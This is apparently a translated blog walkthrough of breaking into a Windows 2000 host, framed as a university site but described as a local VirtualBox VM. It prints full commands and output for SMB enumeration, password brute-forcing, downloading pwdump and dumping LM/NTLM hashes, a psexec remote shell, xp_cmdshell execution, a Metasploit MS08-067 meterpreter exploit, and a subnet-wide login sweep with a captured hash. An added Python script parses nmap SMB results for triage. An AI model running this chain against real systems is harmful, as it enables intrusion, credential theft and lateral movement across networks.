Guangxi Normal University site http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

The 08:00:27 OUI (listed by this nmap version as Cadmus Computer Systems) is the one VirtualBox assigns to its virtual NICs, so despite the public-looking address the target is a local VM, which the sub-millisecond latency also shows. The version scan already gives away the main facts: a Windows 2000 box with SMB (139/445), RPC, Terminal Services and no patching in sight.

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

The READ anonymous access on IPC$ is the null session: it is what allowed smb-enum-users to list the accounts above without any credentials.

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// recover user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_ TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

smb-pwdump drives pwdump6 on the target through smb-psexec, which is why the tarball is unpacked into nselib/data and why the account given in smbuser must have administrative rights on the host (the run succeeding shows test has them). Each line is user:RID followed by the LM hash and the NTLM hash; "NO PASSWORD" is pwdump's placeholder for the hash of an empty password.
C:\Documents and Settings\Administrator\Desktop>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\Desktop\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
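The four NSE runs above (smb-enum-users, smb-enum-shares, smb-brute, smb-check-vulns) each bury one or two findings inside a full host report, and against a subnet that becomes hundreds of blocks to read. The following parser is an added example, not code from the original post: it walks nmap's normal text output, keeps track of the current host and the current script in the "Host script results:" tree, and reduces the lines to findings (enumerated users, shares readable anonymously, successful logins with blank or weak passwords, VULNERABLE checks). SAMPLE is constructed from the output shown on this page.

```python
"""Triage nmap SMB script output (added example, not part of the original post).

Finds each "Nmap scan report for" host, then reads the "Host script results:"
tree beneath it and turns smb-enum-users, smb-enum-shares, smb-brute and
smb-check-vulns lines into (kind, detail) findings.  SAMPLE is constructed
from the output shown on this page, several runs concatenated."""
import re

SAMPLE = """\
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?$")
SCRIPT_RE = re.compile(r"^(smb[\w-]*):$")          # a "| smb-brute:" header line
TREE_RE = re.compile(r"^\|_?\s*")                   # nmap's "| " and "|_ " tree prefix
LOGIN_RE = re.compile(r"^(\S+?):(.+?) => Login was successful$")


def parse_findings(text):
    """Return {ip: [(kind, detail), ...]} for every host in the output."""
    findings = {}
    host = script = share = None
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host = m.group(1)
            findings.setdefault(host, [])
            script = share = None
            continue
        if host is None or not raw.startswith("|"):
            continue                                # port table, timing lines, etc.
        line = TREE_RE.sub("", raw).strip()
        m = SCRIPT_RE.match(line)
        if m:
            script, share = m.group(1), None
            continue
        out = findings[host]
        if script == "smb-enum-users":
            m = re.search(r"Users:\s*(.*)$", line)
            if m:
                out.append(("users", [u.strip() for u in m.group(1).split(",")]))
        elif script == "smb-enum-shares":
            m = re.match(r"^Anonymous access:\s*(.+)$", line)
            if m is None:
                share = line                        # a share-name line such as "IPC$"
            elif share and m.group(1) != "<none>":
                out.append(("anon-share", f"{share}:{m.group(1)}"))
        elif script == "smb-brute":
            m = LOGIN_RE.match(line)
            if m:
                user, password = m.groups()
                kind = "blank-password" if password == "<blank>" else "weak-password"
                out.append((kind, user))
        elif script == "smb-check-vulns":
            name, _, status = line.partition(":")
            if status.strip() == "VULNERABLE":
                out.append(("vuln", name.strip()))
    return findings


def hosts_to_act_on(findings):
    """Hosts with an exploitable service or a working credential, sorted."""
    urgent = {"vuln", "blank-password", "weak-password"}
    return sorted(ip for ip, items in findings.items() if any(k in urgent for k, _ in items))


if __name__ == "__main__":
    found = parse_findings(SAMPLE)
    for ip, items in found.items():
        print(ip)
        for kind, detail in items:
            print(f"  {kind}: {detail}")
    print("act first on:", ", ".join(hosts_to_act_on(found)))
```

Feed it the saved normal output of a subnet-wide run (nmap -oN) and the per-host noise disappears; only the null-session share, the two weak logins and the MS08-067 hit remain for the first host, and the blank administrator login for the second.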

root@bt:~# msfconsole   // use the MS08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the user names and the captured hash to attempt logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful

Note that the value in password.txt is the LM half of test's dumped hash (the NTLM half is 32ED87BDB5FDC5E9CBA88547376818D4 in the smb-pwdump output above), and the only login the sweep reports on 192.168.1.105 is the blank administrator password.

Attack successful: a simple msf + nmap attack.